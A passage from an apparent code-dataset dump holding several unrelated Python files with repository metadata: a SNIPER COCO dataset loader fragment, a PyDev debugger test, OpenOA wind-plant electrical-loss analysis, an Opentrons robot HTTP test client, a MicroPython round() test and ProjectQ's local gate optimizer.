image_dir=None,
anno_path=None,
proposals_file=None,
data_fields=['image'],
sample_num=-1,
load_crowd=False,
allow_empty=True,
empty_ratio=1.,
is_trainset=True,
image_target_sizes=[2000, 1000],
                 valid_box_ratio_ranges=[[-1, 0.1], [0.08, -1]],
chip_target_size=500,
chip_target_stride=200,
use_neg_chip=False,
max_neg_num_per_im=8,
max_per_img=-1,
nms_thresh=0.5):
super(SniperCOCODataSet, self).__init__(
dataset_dir=dataset_dir,
image_dir=image_dir,
anno_path=anno_path,
data_fields=data_fields,
sample_num=sample_num,
load_crowd=load_crowd,
allow_empty=allow_empty,
empty_ratio=empty_ratio
)
self.proposals_file = proposals_file
self.proposals = None
self.anno_cropper = None
self.is_trainset = is_trainset
self.image_target_sizes = image_target_sizes
self.valid_box_ratio_ranges = valid_box_ratio_ranges
self.chip_target_size = chip_target_size
self.chip_target_stride = chip_target_stride
self.use_neg_chip = use_neg_chip
self.max_neg_num_per_im = max_neg_num_per_im
self.max_per_img = max_per_img
self.nms_thresh = nms_thresh
def parse_dataset(self):
if not hasattr(self, "roidbs"):
super(SniperCOCODataSet, self).parse_dataset()
if self.is_trainset:
self._parse_proposals()
self._merge_anno_proposals()
self.ori_roidbs = copy.deepcopy(self.roidbs)
self.init_anno_cropper()
self.roidbs = self.generate_chips_roidbs(self.roidbs, self.is_trainset)
def set_proposals_file(self, file_path):
self.proposals_file = file_path
def init_anno_cropper(self):
logger.info("Init AnnoCropper...")
self.anno_cropper = AnnoCropper(
image_target_sizes=self.image_target_sizes,
valid_box_ratio_ranges=self.valid_box_ratio_ranges,
chip_target_size=self.chip_target_size,
chip_target_stride=self.chip_target_stride,
use_neg_chip=self.use_neg_chip,
max_neg_num_per_im=self.max_neg_num_per_im,
max_per_img=self.max_per_img,
nms_thresh=self.nms_thresh
)
def generate_chips_roidbs(self, roidbs, is_trainset):
if is_trainset:
roidbs = self.anno_cropper.crop_anno_records(roidbs)
else:
roidbs = self.anno_cropper.crop_infer_anno_records(roidbs)
return roidbs
def _parse_proposals(self):
if self.proposals_file:
self.proposals = {}
logger.info("Parse proposals file:{}".format(self.proposals_file))
with open(self.proposals_file, 'r') as f:
proposals = json.load(f)
for prop in proposals:
image_id = prop["image_id"]
if image_id not in self.proposals:
self.proposals[image_id] = []
x, y, w, h = prop["bbox"]
self.proposals[image_id].append([x, y, x + w, y + h])
def _merge_anno_proposals(self):
assert self.roidbs
if self.proposals and len(self.proposals.keys()) > 0:
logger.info("merge proposals to annos")
            for idx, record in enumerate(self.roidbs):
                image_id = int(record["im_id"])
                if image_id not in self.proposals:
                    logger.info("image id: {} has no proposals".format(image_id))
                record["proposals"] = np.array(self.proposals.get(image_id, []), dtype=np.float32)
                self.roidbs[idx] = record
def get_ori_roidbs(self):
if not hasattr(self, "ori_roidbs"):
return None
return self.ori_roidbs
def get_roidbs(self):
if not hasattr(self, "roidbs"):
self.parse_dataset()
return self.roidbs
def set_roidbs(self, roidbs):
self.roidbs = roidbs
def check_or_download_dataset(self):
return
def _parse(self):
image_dir = self.image_dir
if not isinstance(image_dir, Sequence):
image_dir = [image_dir]
images = []
for im_dir in image_dir:
if os.path.isdir(im_dir):
im_dir = os.path.join(self.dataset_dir, im_dir)
images.extend(_make_dataset(im_dir))
elif os.path.isfile(im_dir) and _is_valid_file(im_dir):
images.append(im_dir)
return images
def _load_images(self):
images = self._parse()
ct = 0
records = []
for image in images:
assert image != '' and os.path.isfile(image), \
"Image {} not found".format(image)
if self.sample_num > 0 and ct >= self.sample_num:
break
im = cv2.imread(image)
h, w, c = im.shape
rec = {'im_id': np.array([ct]), 'im_file': image, "h": h, "w": w}
self._imid2path[ct] = image
ct += 1
records.append(rec)
assert len(records) > 0, "No image file found"
return records
def get_imid2path(self):
return self._imid2path
def set_images(self, images):
self._imid2path = {}
self.image_dir = images
self.roidbs = self._load_images()
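# --- Illustrative sketch, not part of the original dataset class ---
# _parse_proposals stores per-image proposals in corner format; the COCO
# [x, y, w, h] to [x1, y1, x2, y2] conversion it applies, in isolation:
def _xywh_to_xyxy_sketch(bbox):
    """Convert a COCO-style [x, y, w, h] box to [x1, y1, x2, y2]."""
    x, y, w, h = bbox
    return [x, y, x + w, y + h]
# _xywh_to_xyxy_sketch([10., 20., 30., 40.]) -> [10., 20., 40., 60.]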
|
ab83aad2618602de99620d4f94e49500e805d05f
|
8f2c55a2530c3e59dab5907c0044c618b88dd09b
|
/tests_python/resources/_debugger_case_smart_step_into3.py
|
1215d125c419bbc7064eb8af0b1eaf6e71da77eb
|
[
"Apache-2.0",
"EPL-1.0"
] |
permissive
|
fabioz/PyDev.Debugger
|
5a9c6d4c09be85a0e2d9fb93567fd65faf04c81d
|
26864816cbfcf002a99913bcc31ebef48042a4ac
|
refs/heads/main
| 2023-08-18T01:08:34.323363
| 2023-04-15T11:15:47
| 2023-04-15T11:15:47
| 21,870,144
| 363
| 126
|
Apache-2.0
| 2023-07-30T23:03:31
| 2014-07-15T18:01:12
|
Python
|
UTF-8
|
Python
| false
| false
| 347
|
py
|
_debugger_case_smart_step_into3.py
|
def foo(arg):
print('on foo mark', arg)
return arg + 1
def main():
items = [1] # break here
gen = (foo(arg) for arg in items)
list(gen)
# import dis
# print('-------- main ------------')
# dis.dis(main)
# print('-------- foo ------------')
# dis.dis(foo)
if __name__ == '__main__':
main()
print('TEST SUCEEDED')
|
e87844c3956177e315d65d64bbb255a7545c4911
|
0acf9e2cfae0ff6468ddf42fc130c29b90999194
|
/operational_analysis/methods/electrical_losses.py
|
c06f912ced8d89beaa097be6b10d238520ee9122
|
[
"BSD-3-Clause"
] |
permissive
|
NREL/OpenOA
|
02c6dc0300f2230f6506b6672fa9284af8010114
|
a7c89bbaed8fb19e9780088f84ce1443c1567b2a
|
refs/heads/main
| 2023-09-04T23:30:29.941733
| 2023-07-25T17:22:53
| 2023-07-25T17:22:53
| 77,166,290
| 160
| 56
|
BSD-3-Clause
| 2023-09-02T00:17:45
| 2016-12-22T18:16:30
|
Python
|
UTF-8
|
Python
| false
| false
| 12,045
|
py
|
electrical_losses.py
|
# This class defines key analytical routines for calculating electrical losses for
# a wind plant using operational data. Electrical loss is calculated per month and on
# an average annual basis by comparing monthly energy production from the turbines
# and the revenue meter
import numpy as np
import pandas as pd
from tqdm import tqdm
from operational_analysis import logging, logged_method_call
logger = logging.getLogger(__name__)
class ElectricalLosses(object):
"""
A serial (Pandas-driven) implementation of calculating the average monthly and annual
electrical losses at a wind plant, and their uncertainty.
Energy output from the turbine SCADA meter and the wind plant revenue
meter are used to estimate electrical losses.
The approach is to first calculate daily sums of turbine and revenue meter energy over the
plant period of record. Only those days where all turbines and the revenue meter were
reporting for all timesteps are considered. Electrical loss is then the difference in
total turbine energy production and meter production over those concurrent days.
A Monte Carlo approach is applied to sample revenue meter data and SCADA data
with a 0.5% imposed uncertainty, and one filtering parameter is sampled too.
The uncertainty in estimated electrical losses is quantified as standard deviation
of the distribution of losses obtained from the MC sampling.
In the case that meter data is not provided on a daily or sub-daily basis (e.g. monthly), a
different approach is implemented. The sum of daily turbine energy is corrected for any missing
reported energy data from the turbines based on the ratio of expected number of data counts per day
to the actual. Daily corrected sum of turbine energy is then summed on a monthly basis. Electrical
loss is then the difference between total corrected turbine energy production and meter production
over those concurrent months.
"""
@logged_method_call
def __init__(self, plant, UQ=False, num_sim=20000):
"""
Initialize electrical losses class with input parameters
Args:
            plant(:obj:`PlantData object`): PlantData object from which ElectricalLosses should draw data.
num_sim:(:obj:`int`): number of Monte Carlo simulations
UQ:(:obj:`bool`): choice whether to perform (True) or not (False) uncertainty quantification
"""
logger.info("Initializing Electrical Losses Object")
# Check that selected UQ is allowed
if UQ:
logger.info("Note: uncertainty quantification will be performed in the calculation")
self.num_sim = num_sim
elif not UQ:
logger.info("Note: uncertainty quantification will NOT be performed in the calculation")
self.num_sim = 1
else:
raise ValueError(
"UQ has to either be True (uncertainty quantification performed, default) or False (uncertainty quantification NOT performed)"
)
self.UQ = UQ
self._plant = plant
        self._min_per_hour = 60  # Minutes per hour converter
self._hours_per_day = 24 # Hours per day converter
@logged_method_call
def run(
self, uncertainty_meter=0.005, uncertainty_scada=0.005, uncertainty_correction_thresh=0.95
):
"""
Run the electrical loss calculation in order by calling this function.
Args:
uncertainty_meter(:obj:`float`): uncertainty imposed to revenue meter data (for UQ = True case)
uncertainty_scada(:obj:`float`): uncertainty imposed to scada data (for UQ = True case)
uncertainty_correction_thresh(:obj:`tuple`): Data availability thresholds (fractions)
under which months should be eliminated.
This should be a tuple in the UQ = True case,
a single value when UQ = False.
Returns:
(None)
"""
# Define uncertainties and check types
expected_type = float if not self.UQ else tuple
assert (
type(uncertainty_correction_thresh) == expected_type
), f"uncertainty_correction_thresh must be {expected_type} for UQ={self.UQ}"
self.uncertainty_correction_thresh = np.array(
uncertainty_correction_thresh, dtype=np.float64
)
if self.UQ:
self.uncertainty_meter = uncertainty_meter
self.uncertainty_scada = uncertainty_scada
# Process SCADA data to daily sums
self.process_scada()
# Process meter data to daily sums (if time frequency is less than monthly)
self._monthly_meter = True # Keep track of reported meter data frequency
if (
(self._plant._meter_freq != "MS")
& (self._plant._meter_freq != "M")
& (self._plant._meter_freq != "1MS")
):
self.process_meter()
self._monthly_meter = False # Set to false if sub-monthly frequency
# Setup Monte Carlo approach
self.setup_inputs()
# Calculate electrical losses, Monte Carlo approach
self.calculate_electrical_losses()
def setup_inputs(self):
"""
Create and populate the data frame defining the simulation parameters.
This data frame is stored as self._inputs
Args:
(None)
Returns:
(None)
"""
if self.UQ:
inputs = {
"meter_data_fraction": np.random.normal(1, self.uncertainty_meter, self.num_sim),
"scada_data_fraction": np.random.normal(1, self.uncertainty_scada, self.num_sim),
"correction_threshold": np.random.randint(
self.uncertainty_correction_thresh[0] * 1000,
self.uncertainty_correction_thresh[1] * 1000,
self.num_sim,
)
/ 1000.0,
}
self._inputs = pd.DataFrame(inputs)
if not self.UQ:
inputs = {
"meter_data_fraction": 1,
"scada_data_fraction": 1,
"correction_threshold": self.uncertainty_correction_thresh,
}
self._inputs = pd.DataFrame(inputs, index=[0])
self._electrical_losses = np.empty([self.num_sim, 1])
@logged_method_call
def process_scada(self):
"""
Calculate daily sum of turbine energy only for days when all turbines are reporting
at all time steps.
Args:
(None)
Returns:
(None)
"""
logger.info("Processing SCADA data")
scada_df = self._plant._scada.df
# Sum up SCADA data power and energy and count number of entries
scada_sum = scada_df.groupby(scada_df.index)[["energy_kwh"]].sum()
scada_sum["count"] = scada_df.groupby(scada_df.index)[["energy_kwh"]].count()
self._scada_sum = scada_sum
# Calculate daily sum of all turbine energy production and count number of entries
self._scada_daily = scada_sum.resample("D")["energy_kwh"].sum().to_frame()
self._scada_daily.columns = ["turbine_energy_kwh"]
self._scada_daily["count"] = scada_sum.resample("D")["count"].sum()
# Specify expected count provided all turbines reporting
expected_count = (
self._hours_per_day
* self._min_per_hour
/ (pd.to_timedelta(self._plant._scada_freq).total_seconds() / 60)
* self._plant._num_turbines
)
# Correct sum of turbine energy for cases with missing reported data
self._scada_daily["corrected_energy"] = (
self._scada_daily["turbine_energy_kwh"] * expected_count / self._scada_daily["count"]
)
self._scada_daily["perc"] = self._scada_daily["count"] / expected_count
# Store daily SCADA data where all turbines reporting for every time step during the day
self._scada_sub = self._scada_daily[self._scada_daily["count"] == expected_count]
@logged_method_call
def process_meter(self):
"""
Calculate daily sum of meter energy only for days when meter data is reporting at all time steps.
Args:
(None)
Returns:
(None)
"""
logger.info("Processing meter data")
meter_df = self._plant._meter.df
# Sum up meter data to daily
self._meter_daily = meter_df.resample("D").sum()
self._meter_daily["mcount"] = meter_df.resample("D")["energy_kwh"].count()
# Specify expected count provided all timestamps reporting
expected_mcount = (
self._hours_per_day
* self._min_per_hour
/ (pd.to_timedelta(self._plant._meter_freq).total_seconds() / 60)
)
# Keep only data with all turbines reporting for every time step during the day
self._meter_daily = self._meter_daily[self._meter_daily["mcount"] == expected_mcount]
@logged_method_call
def calculate_electrical_losses(self):
"""
Apply Monte Carlo approach to calculate electrical losses and their
uncertainty based on the difference in the sum of turbine and metered
energy over the compiled days.
Args:
(None)
Returns:
(None)
"""
logger.info("Calculating electrical losses")
# Loop through number of simulations, calculate losses each time, store results
for n in tqdm(np.arange(self.num_sim)):
self._run = self._inputs.loc[n]
meter_df = self._plant._meter.df
# If monthly meter data, sum the corrected daily turbine energy to monthly and merge with meter
if self._monthly_meter:
scada_monthly = (
self._scada_daily.resample("MS")["corrected_energy"].sum().to_frame()
)
scada_monthly.columns = ["turbine_energy_kwh"]
# Determine availability for each month represented
scada_monthly["count"] = self._scada_sum.resample("MS")["count"].sum()
scada_monthly["expected_count_monthly"] = (
scada_monthly.index.daysinmonth
* self._hours_per_day
* self._min_per_hour
/ (pd.to_timedelta(self._plant._scada_freq).total_seconds() / 60)
* self._plant._num_turbines
)
scada_monthly["perc"] = (
scada_monthly["count"] / scada_monthly["expected_count_monthly"]
)
# Filter out months in which there was less than x% of total running (all turbines at all timesteps)
scada_monthly = scada_monthly.loc[
scada_monthly["perc"] >= self._run.correction_threshold, :
]
merge_df = meter_df.join(scada_monthly)
# If sub-monthly meter data, merge the daily data for which all turbines are reporting at all timestamps
else:
# Note 'self._scada_sub' only contains full reported data
merge_df = self._meter_daily.join(self._scada_sub)
# Drop non-concurrent timestamps and get total sums over concurrent period of record
merge_df.dropna(inplace=True)
self._merge_df = merge_df
merge_sum = merge_df.sum(axis=0)
# Calculate electrical loss from difference of sum of turbine and meter energy
self._total_turbine_energy = (
merge_sum["turbine_energy_kwh"] * self._run.scada_data_fraction
)
self._total_meter_energy = merge_sum["energy_kwh"] * self._run.meter_data_fraction
self._electrical_losses[n] = 1 - self._total_meter_energy / self._total_turbine_energy
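# --- Illustrative usage, not part of the original module ---
# A typical run, assuming `plant` is an already-populated PlantData object.
# With UQ=True, uncertainty_correction_thresh must be a (low, high) tuple
# from which the Monte Carlo thresholds are sampled:
# el = ElectricalLosses(plant, UQ=True, num_sim=20000)
# el.run(uncertainty_meter=0.005,
#        uncertainty_scada=0.005,
#        uncertainty_correction_thresh=(0.9, 0.995))
# mean_loss = el._electrical_losses.mean()
# std_loss = el._electrical_losses.std()  # reported as the uncertainty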
|
c1b04d807381b016121e2329b838fcb3852ddabf
|
6fdb4eaf5b0e6dbd7db4bf947547541e9aebf110
|
/robot-server/tests/integration/robot_client.py
|
23c13bca7c3305609a11e2837a8f4405d5ef4a6c
|
[
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] |
permissive
|
Opentrons/opentrons
|
874321e01149184960eeaeaa31b1d21719a1ceda
|
026b523c8c9e5d45910c490efb89194d72595be9
|
refs/heads/edge
| 2023-09-02T02:51:49.579906
| 2023-08-31T16:02:45
| 2023-08-31T16:02:45
| 38,644,841
| 326
| 174
|
Apache-2.0
| 2023-09-14T21:47:20
| 2015-07-06T20:41:01
|
Python
|
UTF-8
|
Python
| false
| false
| 10,027
|
py
|
robot_client.py
|
from __future__ import annotations
import asyncio
import concurrent.futures
import contextlib
from pathlib import Path
from typing import Any, AsyncGenerator, BinaryIO, Dict, List, Optional, Tuple, Union
import httpx
from httpx import Response
STARTUP_WAIT = 20
SHUTDOWN_WAIT = 20
class RobotClient:
"""Client for the robot's HTTP API.
This is mostly a thin wrapper, where most methods have a 1:1 correspondence
with HTTP endpoints. See the robot server's OpenAPI specification for
details on semantics and request/response shapes.
"""
def __init__(
self,
httpx_client: httpx.AsyncClient,
worker_executor: concurrent.futures.ThreadPoolExecutor,
base_url: str,
) -> None:
"""Initialize the client."""
self.httpx_client = httpx_client
self.worker_executor = worker_executor
self.base_url = base_url
@staticmethod
@contextlib.asynccontextmanager
async def make(base_url: str, version: str) -> AsyncGenerator[RobotClient, None]:
with concurrent.futures.ThreadPoolExecutor() as worker_executor:
async with httpx.AsyncClient(
headers={"opentrons-version": version},
# Set the default timeout high enough for our heaviest requests
# (like fetching a large protocol analysis) to fit comfortably.
# If an individual test wants to shorten this timeout, it should wrap
# its request in anyio.fail_after().
timeout=30,
) as httpx_client:
yield RobotClient(
httpx_client=httpx_client,
worker_executor=worker_executor,
base_url=base_url,
)
async def alive(self) -> bool:
"""Is /health reachable?"""
try:
await self.get_health()
return True
except (httpx.ConnectError, httpx.HTTPStatusError):
return False
async def dead(self) -> bool:
"""Is /health unreachable?"""
try:
await self.get_health()
return False
except httpx.HTTPStatusError:
return False
except httpx.ConnectError:
pass
return True
async def _poll_for_alive(self) -> None:
"""Retry GET /health until reachable."""
while not await self.alive():
# Avoid spamming the server in case a request immediately
# returns some kind of "not ready."
await asyncio.sleep(0.1)
async def _poll_for_dead(self) -> None:
"""Poll GET /health until unreachable."""
while not await self.dead():
# Avoid spamming the server in case a request immediately
# returns some kind of "not ready."
await asyncio.sleep(0.1)
async def wait_until_alive(self, timeout_sec: float = STARTUP_WAIT) -> bool:
try:
await asyncio.wait_for(self._poll_for_alive(), timeout=timeout_sec)
return True
except asyncio.TimeoutError:
return False
async def wait_until_dead(self, timeout_sec: float = SHUTDOWN_WAIT) -> bool:
"""Retry GET /health and until unreachable."""
try:
await asyncio.wait_for(self._poll_for_dead(), timeout=timeout_sec)
return True
except asyncio.TimeoutError:
return False
async def get_health(self) -> Response:
"""GET /health."""
response = await self.httpx_client.get(url=f"{self.base_url}/health")
response.raise_for_status()
return response
async def get_protocols(self) -> Response:
"""GET /protocols."""
response = await self.httpx_client.get(url=f"{self.base_url}/protocols")
response.raise_for_status()
return response
async def get_protocol(self, protocol_id: str) -> Response:
"""GET /protocols/{protocol_id}."""
response = await self.httpx_client.get(
url=f"{self.base_url}/protocols/{protocol_id}"
)
return response
async def post_protocol(
self, files: List[Union[Path, Tuple[str, bytes]]]
) -> Response:
"""POST /protocols.
Params:
files: The files to upload, representing the protocol, custom labware, etc.
                Each file can be provided as a Path, in which case it's read
from the filesystem, or as a (name, contents) tuple.
"""
multipart_upload_name = "files"
with contextlib.ExitStack() as file_exit_stack:
opened_files: List[
Union[BinaryIO, Tuple[str, bytes]],
] = []
for file in files:
if isinstance(file, Path):
opened_file = file_exit_stack.enter_context(file.open("rb"))
opened_files.append(opened_file)
else:
opened_files.append(file)
response = await self.httpx_client.post(
url=f"{self.base_url}/protocols",
files=[(multipart_upload_name, f) for f in opened_files],
)
response.raise_for_status()
return response
async def get_runs(self, length: Optional[int] = None) -> Response:
"""GET /runs."""
response = await self.httpx_client.get(
url=f"{self.base_url}/runs"
if length is None
else f"{self.base_url}/runs?pageLength={length}"
)
response.raise_for_status()
return response
async def post_run(self, req_body: Dict[str, object]) -> Response:
"""POST /runs."""
response = await self.httpx_client.post(
url=f"{self.base_url}/runs", json=req_body
)
response.raise_for_status()
return response
async def patch_run(self, run_id: str, req_body: Dict[str, object]) -> Response:
"""POST /runs."""
response = await self.httpx_client.patch(
url=f"{self.base_url}/runs/{run_id}",
json=req_body,
)
response.raise_for_status()
return response
async def get_run(self, run_id: str) -> Response:
"""GET /runs/:run_id."""
response = await self.httpx_client.get(url=f"{self.base_url}/runs/{run_id}")
response.raise_for_status()
return response
async def post_run_command(
self,
run_id: str,
req_body: Dict[str, object],
params: Dict[str, Any],
) -> Response:
"""POST /runs/:run_id/commands."""
response = await self.httpx_client.post(
url=f"{self.base_url}/runs/{run_id}/commands",
json=req_body,
params=params,
)
response.raise_for_status()
return response
async def get_run_commands(
self,
run_id: str,
cursor: Optional[int] = None,
page_length: Optional[int] = None,
) -> Response:
"""GET /runs/:run_id/commands."""
query_params = {}
if cursor is not None:
query_params["cursor"] = cursor
if page_length is not None:
query_params["pageLength"] = page_length
response = await self.httpx_client.get(
url=f"{self.base_url}/runs/{run_id}/commands", params=query_params
)
response.raise_for_status()
return response
async def get_run_command(self, run_id: str, command_id: str) -> Response:
"""GET /runs/:run_id/commands/:command_id."""
response = await self.httpx_client.get(
url=f"{self.base_url}/runs/{run_id}/commands/{command_id}",
)
response.raise_for_status()
return response
async def post_labware_offset(
self,
run_id: str,
req_body: Dict[str, object],
) -> Response:
"""POST /runs/:run_id/labware_offsets."""
response = await self.httpx_client.post(
url=f"{self.base_url}/runs/{run_id}/labware_offsets",
json=req_body,
)
response.raise_for_status()
return response
async def post_run_action(
self,
run_id: str,
req_body: Dict[str, object],
) -> Response:
"""POST /runs/:run_id/commands."""
response = await self.httpx_client.post(
url=f"{self.base_url}/runs/{run_id}/actions",
json=req_body,
)
response.raise_for_status()
return response
async def get_analyses(self, protocol_id: str) -> Response:
"""GET /protocols/{protocol_id}/analyses."""
response = await self.httpx_client.get(
url=f"{self.base_url}/protocols/{protocol_id}/analyses"
)
response.raise_for_status()
return response
async def get_analysis(self, protocol_id: str, analysis_id: str) -> Response:
"""GET /protocols/{protocol_id}/{analysis_id}."""
response = await self.httpx_client.get(
url=f"{self.base_url}/protocols/{protocol_id}/analyses/{analysis_id}"
)
response.raise_for_status()
return response
async def delete_run(self, run_id: str) -> Response:
"""DELETE /runs/{run_id}."""
response = await self.httpx_client.delete(f"{self.base_url}/runs/{run_id}")
response.raise_for_status()
return response
async def delete_protocol(self, protocol_id: str) -> Response:
"""DELETE /protocols/{protocol_id}."""
response = await self.httpx_client.delete(
f"{self.base_url}/protocols/{protocol_id}"
)
response.raise_for_status()
return response
async def post_setting_reset_options(
self,
req_body: Dict[str, bool],
) -> Response:
"""POST /settings/reset."""
response = await self.httpx_client.post(
url=f"{self.base_url}/settings/reset",
json=req_body,
)
response.raise_for_status()
return response
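# --- Illustrative usage, not part of the original client ---
# A minimal async session; the base URL and header version below are
# assumptions for illustration, not values mandated by this module.
async def _example_session(base_url: str = "http://localhost:31950") -> None:
    """Open a client, wait for /health to come up, then fetch it."""
    async with RobotClient.make(base_url=base_url, version="4") as client:
        if await client.wait_until_alive():
            response = await client.get_health()
            print(response.json())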
|
fe87925d687487dafb366c948482d55cf553f80b
|
83b8b30ebb633eecd29ca0a7a20cc43a293c9333
|
/tests/basics/builtin_round_intbig.py
|
adf9d29f2f10c4e1b8b04bb5824fe979b091e0b8
|
[
"MIT",
"GPL-1.0-or-later"
] |
permissive
|
adafruit/circuitpython
|
430ec895149d1eb814b505db39b4977a35ee88a7
|
506dca71b0cbb7af749bb51f86b01021db5483b3
|
refs/heads/main
| 2023-08-21T16:30:46.781068
| 2023-08-20T00:39:44
| 2023-08-20T00:39:44
| 66,166,069
| 3,806
| 1,560
|
MIT
| 2023-09-14T19:23:51
| 2016-08-20T20:10:40
|
C
|
UTF-8
|
Python
| false
| false
| 347
|
py
|
builtin_round_intbig.py
|
# test round() with large integer values and second arg
# rounding integers is an optional feature so test for it
try:
round(1, -1)
except NotImplementedError:
print('SKIP')
raise SystemExit
i = 2**70
tests = [
(i, 0), (i, -1), (i, -10), (i, 1),
(-i, 0), (-i, -1), (-i, -10), (-i, 1),
]
for t in tests:
print(round(*t))
|
8ebe153a8092571e779627b4e988b1175e3206f7
|
8188f026dcfa3ca6c4e2d58e6c56d04d24e37a18
|
/projectq/cengines/_optimize.py
|
1cce7317ae01f422b5371c504eadd2d150158ccc
|
[
"Apache-2.0"
] |
permissive
|
ProjectQ-Framework/ProjectQ
|
2e342da0622d4b5d513c15504556e95d3d0e2aea
|
67c660ca18725d23ab0b261a45e34873b6a58d03
|
refs/heads/develop
| 2023-09-04T02:18:25.581119
| 2023-03-09T16:03:57
| 2023-03-09T16:03:57
| 77,520,796
| 886
| 335
|
Apache-2.0
| 2023-07-24T07:07:15
| 2016-12-28T09:31:53
|
Python
|
UTF-8
|
Python
| false
| false
| 11,256
|
py
|
_optimize.py
|
# Copyright 2017 ProjectQ-Framework (www.projectq.ch)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A local optimizer engine."""
import warnings
from projectq.ops import FastForwardingGate, FlushGate, NotMergeable
from ._basics import BasicEngine
class LocalOptimizer(BasicEngine):
"""
Circuit optimization compiler engine.
LocalOptimizer is a compiler engine which optimizes locally (merging rotations, cancelling gates with their
    inverse) in a local window of user-defined size.
It stores all commands in a dict of lists, where each qubit has its own gate pipeline. After adding a gate, it
tries to merge / cancel successive gates using the get_merged and get_inverse functions of the gate (if
available). For examples, see BasicRotationGate. Once a list corresponding to a qubit contains >=m gates, the
pipeline is sent on to the next engine.
"""
def __init__(self, cache_size=5, m=None): # pylint: disable=invalid-name
"""
Initialize a LocalOptimizer object.
Args:
cache_size (int): Number of gates to cache per qubit, before sending on the first gate.
"""
super().__init__()
self._l = {} # dict of lists containing operations for each qubit
if m:
warnings.warn(
'Pending breaking API change: LocalOptimizer(m=5) will be dropped in a future version in favor of '
                'LocalOptimizer(cache_size=5)',
DeprecationWarning,
)
cache_size = m
        self._cache_size = cache_size  # wait for cache_size gates before sending on
# sends n gate operations of the qubit with index idx
def _send_qubit_pipeline(self, idx, n_gates):
"""Send n gate operations of the qubit with index idx to the next engine."""
il = self._l[idx] # pylint: disable=invalid-name
for i in range(min(n_gates, len(il))): # loop over first n operations
# send all gates before n-qubit gate for other qubits involved
# --> recursively call send_helper
other_involved_qubits = [qb for qreg in il[i].all_qubits for qb in qreg if qb.id != idx]
for qb in other_involved_qubits:
qubit_id = qb.id
try:
gateloc = 0
# find location of this gate within its list
while self._l[qubit_id][gateloc] != il[i]:
gateloc += 1
gateloc = self._optimize(qubit_id, gateloc)
# flush the gates before the n-qubit gate
self._send_qubit_pipeline(qubit_id, gateloc)
# delete the n-qubit gate, we're taking care of it
# and don't want the other qubit to do so
self._l[qubit_id] = self._l[qubit_id][1:]
except IndexError: # pragma: no cover
print("Invalid qubit pipeline encountered (in the process of shutting down?).")
# all qubits that need to be flushed have been flushed
# --> send on the n-qubit gate
self.send([il[i]])
# n operations have been sent on --> resize our gate list
self._l[idx] = self._l[idx][n_gates:]
def _get_gate_indices(self, idx, i, qubit_ids):
"""
Return all indices of a command.
Each index corresponding to the command's index in one of the qubits' command lists.
Args:
idx (int): qubit index
i (int): command position in qubit idx's command list
IDs (list<int>): IDs of all qubits involved in the command
"""
N = len(qubit_ids)
# 1-qubit gate: only gate at index i in list #idx is involved
if N == 1:
return [i]
# When the same gate appears multiple time, we need to make sure not to
# match earlier instances of the gate applied to the same qubits. So we
# count how many there are, and skip over them when looking in the
# other lists.
cmd = self._l[idx][i]
num_identical_to_skip = sum(1 for prev_cmd in self._l[idx][:i] if prev_cmd == cmd)
indices = []
for qubit_id in qubit_ids:
identical_indices = [i for i, c in enumerate(self._l[qubit_id]) if c == cmd]
indices.append(identical_indices[num_identical_to_skip])
return indices
def _optimize(self, idx, lim=None):
"""
Gate cancellation routine.
Try to remove identity gates using the is_identity function, then merge or even cancel successive gates using
the get_merged and get_inverse functions of the gate (see, e.g., BasicRotationGate).
It does so for all qubit command lists.
"""
# loop over all qubit indices
i = 0
limit = len(self._l[idx])
if lim is not None:
limit = lim
while i < limit - 1:
# can be dropped if the gate is equivalent to an identity gate
if self._l[idx][i].is_identity():
# determine index of this gate on all qubits
qubitids = [qb.id for sublist in self._l[idx][i].all_qubits for qb in sublist]
gid = self._get_gate_indices(idx, i, qubitids)
for j, qubit_id in enumerate(qubitids):
new_list = (
                        self._l[qubit_id][0 : gid[j]] + self._l[qubit_id][gid[j] + 1 :]  # noqa: E203
)
self._l[qubitids[j]] = new_list # pylint: disable=undefined-loop-variable
i = 0
limit -= 1
continue
# can be dropped if two in a row are self-inverses
inv = self._l[idx][i].get_inverse()
if inv == self._l[idx][i + 1]:
# determine index of this gate on all qubits
qubitids = [qb.id for sublist in self._l[idx][i].all_qubits for qb in sublist]
gid = self._get_gate_indices(idx, i, qubitids)
# check that there are no other gates between this and its
# inverse on any of the other qubits involved
erase = True
for j, qubit_id in enumerate(qubitids):
erase *= inv == self._l[qubit_id][gid[j] + 1]
# drop these two gates if possible and goto next iteration
if erase:
for j, qubit_id in enumerate(qubitids):
new_list = (
                            self._l[qubit_id][0 : gid[j]] + self._l[qubit_id][gid[j] + 2 :]  # noqa: E203
)
self._l[qubit_id] = new_list
i = 0
limit -= 2
continue
# gates are not each other's inverses --> check if they're
# mergeable
try:
merged_command = self._l[idx][i].get_merged(self._l[idx][i + 1])
# determine index of this gate on all qubits
qubitids = [qb.id for sublist in self._l[idx][i].all_qubits for qb in sublist]
gid = self._get_gate_indices(idx, i, qubitids)
merge = True
for j, qubit_id in enumerate(qubitids):
merged = self._l[qubit_id][gid[j]].get_merged(self._l[qubit_id][gid[j] + 1])
merge *= merged == merged_command
if merge:
for j, qubit_id in enumerate(qubitids):
self._l[qubit_id][gid[j]] = merged_command
new_list = (
self._l[qubit_id][0 : gid[j] + 1] # noqa: E203
+ self._l[qubit_id][gid[j] + 2 :] # noqa: E203
)
self._l[qubit_id] = new_list
i = 0
limit -= 1
continue
except NotMergeable:
pass # can't merge these two commands.
i += 1 # next iteration: look at next gate
return limit
def _check_and_send(self):
"""Check whether a qubit pipeline must be sent on and, if so, optimize the pipeline and then send it on."""
# NB: self.optimize(i) modifies self._l
for i in self._l: # pylint: disable=consider-using-dict-items
if (
len(self._l[i]) >= self._cache_size
or len(self._l[i]) > 0
and isinstance(self._l[i][-1].gate, FastForwardingGate)
):
self._optimize(i)
if len(self._l[i]) >= self._cache_size and not isinstance(self._l[i][-1].gate, FastForwardingGate):
self._send_qubit_pipeline(i, len(self._l[i]) - self._cache_size + 1)
elif len(self._l[i]) > 0 and isinstance(self._l[i][-1].gate, FastForwardingGate):
self._send_qubit_pipeline(i, len(self._l[i]))
